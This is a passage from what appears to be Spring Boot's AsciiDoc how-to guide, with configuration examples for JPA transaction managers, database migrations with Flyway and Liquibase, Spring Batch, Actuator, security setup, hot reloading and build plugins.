One of them could\nbe picked up by the default `JpaTransactionManager` in Spring Boot if you mark it as\n`@Primary`. The other would have to be explicitly injected into a new instance. Or you\nmight be able to use a JTA transaction manager spanning both.\n
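\nFor example, a minimal sketch of the two transaction managers (assuming plain\n`JpaTransactionManager`; the parameter names match the entity manager factories defined\nabove so that injection resolves by name):\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Bean\n\t@Primary\n\tpublic PlatformTransactionManager customerTransactionManager(\n\t\t\tEntityManagerFactory customerEntityManagerFactory) {\n\t\t\/\/ the @Primary one backs plain @Transactional usage by default\n\t\treturn new JpaTransactionManager(customerEntityManagerFactory);\n\t}\n\n\t@Bean\n\tpublic PlatformTransactionManager orderTransactionManager(\n\t\t\tEntityManagerFactory orderEntityManagerFactory) {\n\t\treturn new JpaTransactionManager(orderEntityManagerFactory);\n\t}\n----\n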
\nIf you are using Spring Data, you need to configure `@EnableJpaRepositories` accordingly:\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Customer.class,\n\t\t\tentityManagerFactoryRef = \"customerEntityManagerFactory\")\n\tpublic class CustomerConfiguration {\n\t\t...\n\t}\n\n\t@Configuration\n\t@EnableJpaRepositories(basePackageClasses = Order.class,\n\t\t\tentityManagerFactoryRef = \"orderEntityManagerFactory\")\n\tpublic class OrderConfiguration {\n\t\t...\n\t}\n----\n\n\n\n[[howto-use-traditional-persistence-xml]]\n=== Use a traditional persistence.xml\nSpring Boot will not search for or use a `META-INF\/persistence.xml` by default. If you\nprefer to use a traditional `persistence.xml`, you need to define your own `@Bean` of type\n`LocalEntityManagerFactoryBean` (with id '`entityManagerFactory`') and set the persistence\nunit name there.\n\nSee\n{sc-spring-boot-autoconfigure}\/orm\/jpa\/JpaBaseConfiguration.{sc-ext}[`JpaBaseConfiguration`]\nfor the default settings.\n\n\n\n[[howto-use-spring-data-jpa--and-mongo-repositories]]\n=== Use Spring Data JPA and Mongo repositories\n\nSpring Data JPA and Spring Data Mongo can both create `Repository` implementations for you\nautomatically. If they are both present on the classpath, you might have to do some extra\nconfiguration to tell Spring Boot which one (or both) should create repositories for\nyou. The most explicit way to do that is to use the standard Spring Data\n`+@Enable*Repositories+` and tell it the location of your `Repository` interfaces\n(where '`*`' is '`Jpa`' or '`Mongo`' or both).\n\nThere are also flags `+spring.data.*.repositories.enabled+` that you can use to switch the\nauto-configured repositories on and off in external configuration. This is useful, for\ninstance, if you want to switch off the Mongo repositories and still use the\nauto-configured `MongoTemplate`.\n\nThe same obstacle and the same features exist for other auto-configured Spring Data\nrepository types (Elasticsearch, Solr). Just change the names of the annotations and flags\nrespectively.\n\n\n\n[[howto-use-exposing-spring-data-repositories-rest-endpoint]]\n=== Expose Spring Data repositories as REST endpoint\nSpring Data REST can expose the `Repository` implementations as REST endpoints for you as\nlong as Spring MVC has been enabled for the application.\n\nSpring Boot exposes a set of useful properties from the `spring.data.rest` namespace that\ncustomize the\n{spring-data-rest-javadoc}\/core\/config\/RepositoryRestConfiguration.{dc-ext}[`RepositoryRestConfiguration`].\nIf you need to provide additional customization, you should use a\n{spring-data-rest-javadoc}\/webmvc\/config\/RepositoryRestConfigurer.{dc-ext}[`RepositoryRestConfigurer`]\nbean.\n\nNOTE: If you don't specify any order on your custom `RepositoryRestConfigurer` it will run\nafter the one Spring Boot uses internally. 
If you need to specify an order, make sure it\nis higher than 0.\n\n\n\n[[howto-configure-a-component-that-is-used-by-JPA]]\n=== Configure a component that is used by JPA\nIf you want to configure a component that will be used by JPA then you need to ensure\nthat the component is initialized before JPA. Where the component is auto-configured\nSpring Boot will take care of this for you. For example, when Flyway is auto-configured,\nHibernate is configured to depend upon Flyway so that the latter has a chance to\ninitialize the database before Hibernate tries to use it.\n\nIf you are configuring a component yourself, you can use an\n`EntityManagerFactoryDependsOnPostProcessor` subclass as a convenient way of setting up\nthe necessary dependencies. For example, if you are using Hibernate Search with\nElasticsearch as its index manager then any `EntityManagerFactory` beans must be\nconfigured to depend on the `elasticsearchClient` bean:\n\n[source,java,indent=0]\n----\ninclude::{code-examples}\/elasticsearch\/HibernateSearchElasticsearchExample.java[tag=configuration]\n----\n\n\n\n[[howto-configure-jOOQ-with-multiple-datasources]]\n=== Configure jOOQ with Two DataSources\nIf you need to use jOOQ with multiple data sources, you should create your own\n`DSLContext` for each, refer to\n{sc-spring-boot-autoconfigure}\/jooq\/JooqAutoConfiguration.{sc-ext}[JooqAutoConfiguration]\nfor more details.\n\nTIP: In particular, `JooqExceptionTranslator` and `SpringTransactionProvider` can be\nreused to provide similar features to what the auto-configuration does with a single\n`DataSource`.\n\n\n\n[[howto-database-initialization]]\n== Database initialization\nAn SQL database can be initialized in different ways depending on what your stack is. Or\nof course you can do it manually as long as the database is a separate process.\n\n\n\n[[howto-initialize-a-database-using-jpa]]\n=== Initialize a database using JPA\nJPA has features for DDL generation, and these can be set up to run on startup against the\ndatabase. This is controlled through two external properties:\n\n* `spring.jpa.generate-ddl` (boolean) switches the feature on and off and is vendor\n independent.\n* `spring.jpa.hibernate.ddl-auto` (enum) is a Hibernate feature that controls the\n behavior in a more fine-grained way. See below for more detail.\n\n\n\n[[howto-initialize-a-database-using-hibernate]]\n=== Initialize a database using Hibernate\nYou can set `spring.jpa.hibernate.ddl-auto` explicitly and the standard Hibernate property\nvalues are `none`, `validate`, `update`, `create`, `create-drop`. Spring Boot chooses a\ndefault value for you based on whether it thinks your database is embedded (default\n`create-drop`) or not (default `none`). An embedded database is detected by looking at the\n`Connection` type: `hsqldb`, `h2` and `derby` are embedded, the rest are not. Be careful\nwhen switching from in-memory to a '`real`' database that you don't make assumptions about\nthe existence of the tables and data in the new platform. You either have to set `ddl-auto`\nexplicitly, or use one of the other mechanisms to initialize the database.\n\nNOTE: You can output the schema creation by enabling the `org.hibernate.SQL` logger. This\nis done for you automatically if you enable the <<boot-features-logging-console-output,debug mode>>.\n\nIn addition, a file named `import.sql` in the root of the classpath will be executed on\nstartup if Hibernate creates the schema from scratch (that is if the `ddl-auto` property\nis set to `create` or `create-drop`). 
This can be useful for demos and for testing if you\nare careful, but probably not something you want to be on the classpath in production. It\nis a Hibernate feature (nothing to do with Spring).\n\n\n[[howto-initialize-a-database-using-spring-jdbc]]\n=== Initialize a database\nSpring Boot can automatically create the schema (DDL scripts) of your `DataSource` and\ninitialize it (DML scripts): it loads SQL from the standard root classpath locations\n`schema.sql` and `data.sql`, respectively. In addition Spring Boot will process the\n`schema-${platform}.sql` and `data-${platform}.sql` files (if present), where `platform`\nis the value of `spring.datasource.platform`. This allows you to switch to\ndatabase-specific scripts if necessary, e.g. you might choose to set it to the vendor\nname of the database (`hsqldb`, `h2`, `oracle`, `mysql`, `postgresql` etc.).\n\nSpring Boot enables the fail-fast feature of the Spring JDBC initializer by default, so if\nthe scripts cause exceptions the application will fail to start. You can tune that using\n`spring.datasource.continue-on-error`.\n\nNOTE: In a JPA-based app, you can choose to let Hibernate create the schema or use\n`schema.sql` but not both. Make sure to disable `spring.jpa.hibernate.ddl-auto` if you\nchose the latter.\n\nYou can also disable initialization by setting `spring.datasource.initialize` to `false`.\n\n\n\n[[howto-initialize-a-spring-batch-database]]\n=== Initialize a Spring Batch database\nIf you are using Spring Batch then it comes pre-packaged with SQL initialization scripts\nfor most popular database platforms. Spring Boot will detect your database type, and\nexecute those scripts by default, and in this case will switch the fail-fast setting to\nfalse (errors are logged but do not prevent the application from starting). This is\nbecause the scripts are known to be reliable and generally do not contain bugs, so errors\nare ignorable, and ignoring them makes the scripts idempotent. You can switch off the\ninitialization explicitly using `spring.batch.initializer.enabled=false`.\n\n\n\n[[howto-use-a-higher-level-database-migration-tool]]\n=== Use a higher-level database migration tool\nSpring Boot supports two higher-level migration tools: http:\/\/flywaydb.org\/[Flyway]\nand http:\/\/www.liquibase.org\/[Liquibase].\n\n[[howto-execute-flyway-database-migrations-on-startup]]\n==== Execute Flyway database migrations on startup\nTo automatically run Flyway database migrations on startup, add\n`org.flywaydb:flyway-core` to your classpath.\n\nThe migrations are scripts in the form `V<VERSION>__<NAME>.sql` (with `<VERSION>` an\nunderscore-separated version, e.g. '`1`' or '`2_1`'). By default they live in a folder\n`classpath:db\/migration` but you can modify that using `flyway.locations`. You can also\nadd a special `{vendor}` placeholder to use vendor-specific scripts. Assume the following:\n\n[source,properties,indent=0]\n----\n\tflyway.locations=db\/migration\/{vendor}\n----\n\nRather than using `db\/migration`, this configuration will set the folder to use according\nto the type of the database (i.e. `db\/migration\/mysql` for MySQL). The list of supported\ndatabases is available in {sc-spring-boot}\/jdbc\/DatabaseDriver.{sc-ext}[`DatabaseDriver`].\n\nSee also the Flyway class from flyway-core for details of available settings like schemas\netc. 
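\n\nFor example, a hypothetical first migration could be the file\n`classpath:db\/migration\/V1__init.sql` (version `1`, name `init`; the table is purely\nillustrative):\n\n[source,sql,indent=0]\n----\n\tCREATE TABLE customer (\n\t\tid BIGINT NOT NULL PRIMARY KEY,\n\t\tname VARCHAR(100) NOT NULL\n\t);\n----\n\n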
In addition Spring Boot provides a small set of properties in\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayProperties.{sc-ext}[`FlywayProperties`]\nthat can be used to disable the migrations, or switch off the location checking. Spring\nBoot will call `Flyway.migrate()` to perform the database migration. If you would like\nmore control, provide a `@Bean` that implements\n{sc-spring-boot-autoconfigure}\/flyway\/FlywayMigrationStrategy.{sc-ext}[`FlywayMigrationStrategy`].\n\nTIP: If you want to make use of http:\/\/flywaydb.org\/documentation\/callbacks.html[Flyway\ncallbacks], those scripts should also live in the `classpath:db\/migration` folder.\n\nBy default Flyway will autowire the (`@Primary`) `DataSource` in your context and\nuse that for migrations. If you like to use a different `DataSource` you can create\none and mark its `@Bean` as `@FlywayDataSource` - if you do that remember to create\nanother one and mark it as `@Primary` if you want two data sources.\nOr you can use Flyway's native `DataSource` by setting `flyway.[url,user,password]`\nin external properties.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-flyway[Flyway sample] so\nyou can see how to set things up.\n\nYou can also use Flyway to provide data for specific scenarios. For example, you can\nplace test-specific migrations in `src\/test\/resources` and they will only be run when your\napplication starts for testing. If you want to be more sophisticated you can use\nprofile-specific configuration to customize `flyway.locations` so that certain migrations\nwill only run when a particular profile is active. For example, in\n`application-dev.properties` you could set `flyway.locations` to\n`classpath:\/db\/migration, classpath:\/dev\/db\/migration` and migrations in `dev\/db\/migration`\nwill only run when the `dev` profile is active.\n\n\n\n[[howto-execute-liquibase-database-migrations-on-startup]]\n==== Execute Liquibase database migrations on startup\nTo automatically run Liquibase database migrations on startup, add the\n`org.liquibase:liquibase-core` to your classpath.\n\nThe master change log is by default read from `db\/changelog\/db.changelog-master.yaml` but\ncan be set using `liquibase.change-log`. In addition to YAML, Liquibase also supports\nJSON, XML, and SQL change log formats.\n\nBy default Liquibase will autowire the (`@Primary`) `DataSource` in your context and use\nthat for migrations. If you like to use a different `DataSource` you can create one and\nmark its `@Bean` as `@LiquibaseDataSource` - if you do that remember to create another one\nand mark it as `@Primary` if you want two data sources. Or you can use Liquibase's native\n`DataSource` by setting `liquibase.[url,user,password]` in external properties.\n\nSee\n{sc-spring-boot-autoconfigure}\/liquibase\/LiquibaseProperties.{sc-ext}[`LiquibaseProperties`]\nfor details of available settings like contexts, default schema etc.\n\nThere is a {github-code}\/spring-boot-samples\/spring-boot-sample-liquibase[Liquibase sample]\nso you can see how to set things up.\n\n\n\n[[howto-messaging]]\n== Messaging\n\n\n\n[[howto-jms-disable-transaction]]\n=== Disable transacted JMS session\nIf your JMS broker does not support transacted session, you will have to disable the\nsupport of transactions altogether. If you create your own `JmsListenerContainerFactory`\nthere is nothing to do since it won't be transacted by default. 
If you want to use\nthe `DefaultJmsListenerContainerFactoryConfigurer` to reuse Spring Boot's default, you\ncan disable transacted session as follows:\n\n[source,java,indent=0]\n----\n\t@Bean\n\tpublic DefaultJmsListenerContainerFactory jmsListenerContainerFactory(\n\t\t\tConnectionFactory connectionFactory,\n\t\t\tDefaultJmsListenerContainerFactoryConfigurer configurer) {\n\t\tDefaultJmsListenerContainerFactory listenerFactory =\n\t\t\t\tnew DefaultJmsListenerContainerFactory();\n\t\tconfigurer.configure(listenerFactory, connectionFactory);\n\t\tlistenerFactory.setTransactionManager(null);\n\t\tlistenerFactory.setSessionTransacted(false);\n\t\treturn listenerFactory;\n\t}\n----\n\nThis overrides the default factory and this should be applied to any other factory that\nyour application defines, if any.\n\n\n\n[[howto-batch-applications]]\n== Batch applications\n\nNOTE: By default, batch applications require a `DataSource` to store job details. If you\nwant to deviate from that, you'll need to implement `BatchConfigurer`, see\n{spring-batch-javadoc}\/core\/configuration\/annotation\/EnableBatchProcessing.html[The\nJavadoc of `@EnableBatchProcessing`] for more details.\n\n\n\n[[howto-execute-spring-batch-jobs-on-startup]]\n=== Execute Spring Batch jobs on startup\nSpring Batch auto-configuration is enabled by adding `@EnableBatchProcessing`\n(from Spring Batch) somewhere in your context.\n\nBy default it executes *all* `Jobs` in the application context on startup (see\n{sc-spring-boot-autoconfigure}\/batch\/JobLauncherCommandLineRunner.{sc-ext}[JobLauncherCommandLineRunner]\nfor details). You can narrow down to a specific job or jobs by specifying\n`spring.batch.job.names` (comma-separated job name patterns).\n\nIf the application context includes a `JobRegistry` then the jobs in\n`spring.batch.job.names` are looked up in the registry instead of being autowired from the\ncontext. This is a common pattern with more complex systems where multiple jobs are\ndefined in child contexts and registered centrally.\n\nSee\n{sc-spring-boot-autoconfigure}\/batch\/BatchAutoConfiguration.{sc-ext}[BatchAutoConfiguration]\nand\nhttps:\/\/github.com\/spring-projects\/spring-batch\/blob\/master\/spring-batch-core\/src\/main\/java\/org\/springframework\/batch\/core\/configuration\/annotation\/EnableBatchProcessing.java[@EnableBatchProcessing]\nfor more details.\n\n\n\n[[howto-actuator]]\n== Actuator\n\n\n\n[[howto-change-the-http-port-or-address-of-the-actuator-endpoints]]\n=== Change the HTTP port or address of the actuator endpoints\nIn a standalone application the Actuator HTTP port defaults to the same as the main HTTP\nport. To make the application listen on a different port set the external property\n`management.port`. To listen on a completely different network address (e.g. 
if you have\nan internal network for management and an external one for user applications) you can\nalso set `management.address` to a valid IP address that the server is able to bind to.\n\nFor more detail look at the\n{sc-spring-boot-actuator}\/autoconfigure\/ManagementServerProperties.{sc-ext}[`ManagementServerProperties`]\nsource code and\n_<<production-ready-features.adoc#production-ready-customizing-management-server-port>>_\nin the '`Production-ready features`' section.\n\n\n\n[[howto-customize-the-whitelabel-error-page]]\n=== Customize the '`whitelabel`' error page\nSpring Boot installs a '`whitelabel`' error page that you will see in a browser client if\nyou encounter a server error (machine clients consuming JSON and other media types should\nsee a sensible response with the right error code).\n\nNOTE: Set `server.error.whitelabel.enabled=false` to switch the default error page off,\nwhich will restore the default of the servlet container that you are using. Note that\nSpring Boot will still attempt to resolve the error view so you'd probably add your own\nerror page rather than disabling it completely.\n\nOverriding the error page with your own depends on the templating technology that you are\nusing. For example, if you are using Thymeleaf you would add an `error.html` template and\nif you are using FreeMarker you would add an `error.ftl` template. In general what you\nneed is a `View` that resolves with a name of `error`, and\/or a `@Controller` that handles\nthe `\/error` path. Unless you replaced some of the default configuration you should find\na `BeanNameViewResolver` in your `ApplicationContext` so a `@Bean` with id `error` would\nbe a simple way of doing that. Look at\n{sc-spring-boot-autoconfigure}\/web\/ErrorMvcAutoConfiguration.{sc-ext}[`ErrorMvcAutoConfiguration`] for more options.\n\nSee also the section on <<boot-features-error-handling, Error Handling>> for details of\nhow to register handlers in the servlet container.\n\n\n\n[[howto-use-actuator-with-jersey]]\n=== Actuator and Jersey\nActuator HTTP endpoints are only available for Spring MVC-based applications. If you want\nto use Jersey and still use the actuator you will need to enable Spring MVC (by depending\non `spring-boot-starter-web`, for example). By default, both Jersey and the Spring MVC\ndispatcher servlet are mapped to the same path (`\/`). You will need to change the path for\none of them (by configuring `server.servlet-path` for Spring MVC or\n`spring.jersey.application-path` for Jersey). For example, if you add\n`server.servlet-path=\/system` into `application.properties`, the actuator HTTP endpoints\nwill be available under `\/system`.\n\n\n\n[[howto-security]]\n== Security\n\n\n[[howto-switch-off-spring-boot-security-configuration]]\n=== Switch off the Spring Boot security configuration\nIf you define a `@Configuration` with `@EnableWebSecurity` anywhere in your application\nit will switch off the default webapp security settings in Spring Boot (but leave the\nActuator's security enabled). 
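\n\nA minimal sketch of such a configuration (the class name is illustrative, and it simply\nopens up all requests to show the shape; adjust the rules to your needs):\n\n[source,java,indent=0]\n----\n\t@Configuration\n\t@EnableWebSecurity\n\tpublic class WebSecurityConfig extends WebSecurityConfigurerAdapter {\n\n\t\t@Override\n\t\tprotected void configure(HttpSecurity http) throws Exception {\n\t\t\t\/\/ defining this class alone switches off Boot's default rules;\n\t\t\t\/\/ from here on the web security configuration is entirely yours\n\t\t\thttp.authorizeRequests().anyRequest().permitAll();\n\t\t}\n\n\t}\n----\n\n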
To tweak the defaults try setting properties in\n`+security.*+` (see\n{sc-spring-boot-autoconfigure}\/security\/SecurityProperties.{sc-ext}[`SecurityProperties`]\nfor details of available settings) and `SECURITY` section of\n<<common-application-properties-security,Common application properties>>.\n\n\n\n[[howto-change-the-authenticationmanager-and-add-user-accounts]]\n=== Change the AuthenticationManager and add user accounts\nIf you provide a `@Bean` of type `AuthenticationManager` the default one will not be\ncreated, so you have the full feature set of Spring Security available (e.g.\nhttp:\/\/docs.spring.io\/spring-security\/site\/docs\/current\/reference\/htmlsingle\/#jc-authentication[various authentication options]).\n\nSpring Security also provides a convenient `AuthenticationManagerBuilder` which can be\nused to build an `AuthenticationManager` with common options. The recommended way to\nuse this in a webapp is to inject it into a void method in a\n`WebSecurityConfigurerAdapter`, e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class SecurityConfiguration extends WebSecurityConfigurerAdapter {\n\n\t\t@Autowired\n\t\tpublic void configureGlobal(AuthenticationManagerBuilder auth) throws Exception {\n\t\t\t\tauth.inMemoryAuthentication()\n\t\t\t\t\t.withUser(\"barry\").password(\"password\").roles(\"USER\"); \/\/ ... etc.\n\t\t}\n\n\t\t\/\/ ... other stuff for application security\n\n\t}\n----\n\nYou will get the best results if you put this in a nested class, or a standalone class\n(i.e. not mixed in with a lot of other `@Beans` that might be allowed to influence the\norder of instantiation). The {github-code}\/spring-boot-samples\/spring-boot-sample-web-secure[secure web sample]\nis a useful template to follow.\n\nIf you experience instantiation issues (e.g. using JDBC or JPA for the user detail store)\nit might be worth extracting the `AuthenticationManagerBuilder` callback into a\n`GlobalAuthenticationConfigurerAdapter` (in the `init()` method so it happens before the\nauthentication manager is needed elsewhere), e.g.\n\n[source,java,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t@Configuration\n\tpublic class AuthenticationManagerConfiguration extends\n\t\t\tGlobalAuthenticationConfigurerAdapter {\n\n\t\t@Override\n\t\tpublic void init(AuthenticationManagerBuilder auth) {\n\t\t\tauth.inMemoryAuthentication() \/\/ ... etc.\n\t\t}\n\n\t}\n----\n\n\n\n[[howto-enable-https]]\n=== Enable HTTPS when running behind a proxy server\nEnsuring that all your main endpoints are only available over HTTPS is an important\nchore for any application. If you are using Tomcat as a servlet container, then\nSpring Boot will add Tomcat's own `RemoteIpValve` automatically if it detects some\nenvironment settings, and you should be able to rely on the `HttpServletRequest` to\nreport whether it is secure or not (even downstream of a proxy server that handles the\nreal SSL termination). The standard behavior is determined by the presence or absence of\ncertain request headers (`x-forwarded-for` and `x-forwarded-proto`), whose names are\nconventional, so it should work with most front end proxies. You can switch on the valve\nby adding some entries to `application.properties`, e.g.\n\n[source,properties,indent=0]\n----\n\tserver.tomcat.remote-ip-header=x-forwarded-for\n\tserver.tomcat.protocol-header=x-forwarded-proto\n----\n\n(The presence of either of those properties will switch on the valve. 
Or you can add the\n`RemoteIpValve` yourself by adding a `TomcatEmbeddedServletContainerFactory` bean.)\n\nSpring Security can also be configured to require a secure channel for all (or some)\nrequests. To switch that on in a Spring Boot application you just need to set\n`security.require_ssl` to `true` in `application.properties`.\n\n\n\n[[howto-hotswapping]]\n== Hot swapping\n\n\n\n[[howto-reload-static-content]]\n=== Reload static content\nThere are several options for hot reloading. The recommended approach is to use\n<<using-spring-boot.adoc#using-boot-devtools,`spring-boot-devtools`>> as it provides\nadditional development-time features such as support for fast application restarts\nand LiveReload as well as sensible development-time configuration (e.g. template caching).\nDevtools works by monitoring the classpath for changes. This means that static resource\nchanges must be \"built\" for the change to take effect. By default, this happens\nautomatically in Eclipse when you save your changes. In IntelliJ IDEA, Make Project will\ntrigger the necessary build. Due to the\n<<using-spring-boot.adoc#using-boot-devtools-restart-exclude, default restart\nexclusions>>, changes to static resources will not trigger a restart of your application.\nThey will, however, trigger a live reload.\n\nAlternatively, running in an IDE (especially with debugging on) is a good way to do\ndevelopment (all modern IDEs allow reloading of static resources and usually also\nhot-swapping of Java class changes).\n\nFinally, the <<build-tool-plugins.adoc#build-tool-plugins, Maven and Gradle plugins>> can\nbe configured (see the `addResources` property) to support running from the command line\nwith reloading of static files directly from source. You can use that with an external\ncss\/js compiler process if you are writing that code with higher-level tools.\n\n\n\n[[howto-reload-thymeleaf-template-content]]\n=== Reload templates without restarting the container\nMost of the templating technologies supported by Spring Boot include a configuration\noption to disable caching (see below for details). If you're using the\n`spring-boot-devtools` module these properties will be\n<<using-spring-boot.adoc#using-boot-devtools-property-defaults,automatically configured>>\nfor you at development time.\n\n\n\n[[howto-reload-thymeleaf-content]]\n==== Thymeleaf templates\nIf you are using Thymeleaf, then set `spring.thymeleaf.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/thymeleaf\/ThymeleafAutoConfiguration.{sc-ext}[`ThymeleafAutoConfiguration`]\nfor other Thymeleaf customization options.\n\n\n\n[[howto-reload-freemarker-content]]\n==== FreeMarker templates\nIf you are using FreeMarker, then set `spring.freemarker.cache` to `false`. See\n{sc-spring-boot-autoconfigure}\/freemarker\/FreeMarkerAutoConfiguration.{sc-ext}[`FreeMarkerAutoConfiguration`]\nfor other FreeMarker customization options.\n\n\n\n[[howto-reload-groovy-template-content]]\n==== Groovy templates\nIf you are using Groovy templates, then set `spring.groovy.template.cache` to `false`. 
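\n\nIn practice you might collect these development-time settings in one place; a sketch of\nan `application-dev.properties` (the profile name is illustrative) that disables the\ncaches of the engines you use:\n\n[source,properties,indent=0]\n----\n\tspring.thymeleaf.cache=false\n\tspring.freemarker.cache=false\n\tspring.groovy.template.cache=false\n----\n\n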
See\n{sc-spring-boot-autoconfigure}\/groovy\/template\/GroovyTemplateAutoConfiguration.{sc-ext}[`GroovyTemplateAutoConfiguration`]\nfor other Groovy customization options.\n\n\n\n[[howto-reload-fast-restart]]\n=== Fast application restarts\nThe `spring-boot-devtools` module includes support for automatic application restarts.\nWhilst not as fast as technologies such as http:\/\/zeroturnaround.com\/software\/jrebel\/[JRebel]\nor https:\/\/github.com\/spring-projects\/spring-loaded[Spring Loaded] it's usually\nsignificantly faster than a \"`cold start`\". You should probably give it a try before\ninvestigating some of the more complex reload options discussed below.\n\nFor more details see the <<using-spring-boot.adoc#using-boot-devtools>> section.\n\n\n[[howto-reload-java-classes-without-restarting]]\n=== Reload Java classes without restarting the container\nModern IDEs (Eclipse, IDEA, etc.) all support hot swapping of bytecode, so if you make a\nchange that doesn't affect class or method signatures it should reload cleanly with no\nside effects.\n\nhttps:\/\/github.com\/spring-projects\/spring-loaded[Spring Loaded] goes a little further in\nthat it can reload class definitions with changes in the method signatures. With some\ncustomization it can force an `ApplicationContext` to refresh itself (but there is no\ngeneral mechanism to ensure that would be safe for a running application anyway, so it\nwould only ever be a development time trick probably).\n\n\n[[howto-reload-springloaded-maven]]\n==== Configuring Spring Loaded for use with Maven\nTo use Spring Loaded with the Maven command line, just add it as a dependency in the\nSpring Boot plugin declaration, e.g.\n\n[source,xml,indent=0]\n----\n\t<plugin>\n\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t<dependencies>\n\t\t\t<dependency>\n\t\t\t\t<groupId>org.springframework<\/groupId>\n\t\t\t\t<artifactId>springloaded<\/artifactId>\n\t\t\t\t<version>1.2.6.RELEASE<\/version>\n\t\t\t<\/dependency>\n\t\t<\/dependencies>\n\t<\/plugin>\n----\n\nThis normally works pretty well with Eclipse and IntelliJ IDEA as long as they have their\nbuild configuration aligned with the Maven defaults (Eclipse m2e does this out of the\nbox).\n\n\n\n[[howto-reload-springloaded-gradle-and-intellij-idea]]\n==== Configuring Spring Loaded for use with Gradle and IntelliJ IDEA\nYou need to jump through a few hoops if you want to use Spring Loaded in combination with\nGradle and IntelliJ IDEA. 
By default, IntelliJ IDEA will compile classes into a different\nlocation than Gradle, causing Spring Loaded monitoring to fail.\n\nTo configure IntelliJ IDEA correctly you can use the `idea` Gradle plugin:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tbuildscript {\n\t\trepositories { jcenter() }\n\t\tdependencies {\n\t\t\tclasspath \"org.springframework.boot:spring-boot-gradle-plugin:{spring-boot-version}\"\n\t\t\tclasspath 'org.springframework:springloaded:1.2.6.RELEASE'\n\t\t}\n\t}\n\n\tapply plugin: 'idea'\n\n\tidea {\n\t\tmodule {\n\t\t\tinheritOutputDirs = false\n\t\t\toutputDir = file(\"$buildDir\/classes\/main\/\")\n\t\t}\n\t}\n\n\t\/\/ ...\n\n----\n\nNOTE: IntelliJ IDEA must be configured to use the same Java version as the command line\nGradle task and `springloaded` *must* be included as a `buildscript` dependency.\n\nYou can also additionally enable '`Make Project Automatically`' inside IntelliJ IDEA to\nautomatically compile your code whenever a file is saved.\n\n\n\n[[howto-build]]\n== Build\n\n\n\n[[howto-build-info]]\n=== Generate build information\nBoth the Maven and Gradle plugin allow to generate build information containing\nthe coordinates, name and version of the project. The plugin can also be configured\nto add additional properties through configuration. When such file is present,\nSpring Boot auto-configures a `BuildProperties` bean.\n\nTo generate build information with Maven, add an execution for the `build-info` goal:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot<\/groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin<\/artifactId>\n\t\t\t\t<version>{spring-boot-version}<\/version>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>build-info<\/goal>\n\t\t\t\t\t\t<\/goals>\n\t\t\t\t\t<\/execution>\n\t\t\t\t<\/executions>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nTIP: Check the {spring-boot-maven-plugin-site}\/[Spring Boot Maven Plugin documentation]\nfor more details.\n\nAnd to do the same with Gradle:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo()\n\t}\n----\n\nAdditional properties can be added using the DSL:\n\n[source,groovy,indent=0,subs=\"verbatim,attributes\"]\n----\n\tspringBoot {\n\t\tbuildInfo {\n\t\t\tadditionalProperties = [\n\t\t\t\t'foo': 'bar'\n\t\t\t]\n\t\t}\n\t}\n----\n\n\n\n[[howto-git-info]]\n=== Generate git information\n\nBoth Maven and Gradle allow to generate a `git.properties` file containing information\nabout the state of your `git` source code repository when the project was built.\n\nFor Maven users the `spring-boot-starter-parent` POM includes a pre-configured plugin to\ngenerate a `git.properties` file. Simply add the following declaration to your POM:\n\n[source,xml,indent=0]\n----\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>pl.project13.maven<\/groupId>\n\t\t\t\t<artifactId>git-commit-id-plugin<\/artifactId>\n\t\t\t<\/plugin>\n\t\t<\/plugins>\n\t<\/build>\n----\n\nGradle users can achieve the same result using the\nhttps:\/\/plugins.gradle.org\/plugin\/com.gorylenko.gradle-git-properties[`gradle-git-properties`] plugin\n\n[source,groovy,indent=0]\n----\n\tplugins {\n\t\tid \"com.gorylenko.gradle-git-properties\" version \"1.4.17\"\n\t}\n----\n\nTIP: The commit time in `git.properties` is expected to match the format\n`yyyy-MM-dd'T'HH:mm:ssZ`. 
This is the default format for both plugins listed above. Using this format\nallows the time to be parsed into a `Date` and its format when serialized to JSON to be controlled by\nJackson's date serialization configuration settings.\n\n\n\n[[howto-customize-dependency-versions-with-maven]]\n[[howto-customize-dependency-versions]]\n=== Customize dependency versions\nIf you use a Maven build that inherits directly or indirectly from `spring-boot-dependencies`\n(for instance `spring-boot-starter-parent`) but you want to override a specific\nthird-party dependency you can add appropriate `<properties>` elements. Browse\nthe {github-code}\/spring-boot-dependencies\/pom.xml[`spring-boot-dependencies`]\nPOM for a complete list of properties. For example, to pick a different `slf4j` version\nyou would add the following:\n\n[source,xml,indent=0,subs=\"verbatim,quotes,attributes\"]\n----\n\t<properties>\n\t\t<slf4j.version>1.7.5<\/slf4j.version>\n\t<\/properties>\n----\n\nNOTE: This only works if your Maven project inherits (directly or indirectly) from\n`spring-boot-dependencies`. If you have added `spring-boot-dependencies` in your\nown `dependencyManagement` section with `<scope>import<\/scope>` you have to redefine\nthe artifact yourself instead of overriding the property.\n\nWARNING: Each Spring Boot release is designed and tested against a specific set of\nthird-party dependencies. Overriding versions may cause compatibility issues.\n\nTo override dependency versions in Gradle, you can specify a version as shown below:\n\n[source,groovy,indent=0]\n----\n\text['slf4j.version'] = '1.7.5'\n----\n\nFor additional information, please refer to the\nhttps:\/\/github.com\/spring-gradle-plugins\/dependency-management-plugin[Gradle Dependency\nManagement Plugin documentation].\n\n[[howto-create-an-executable-jar-with-maven]]\n=== 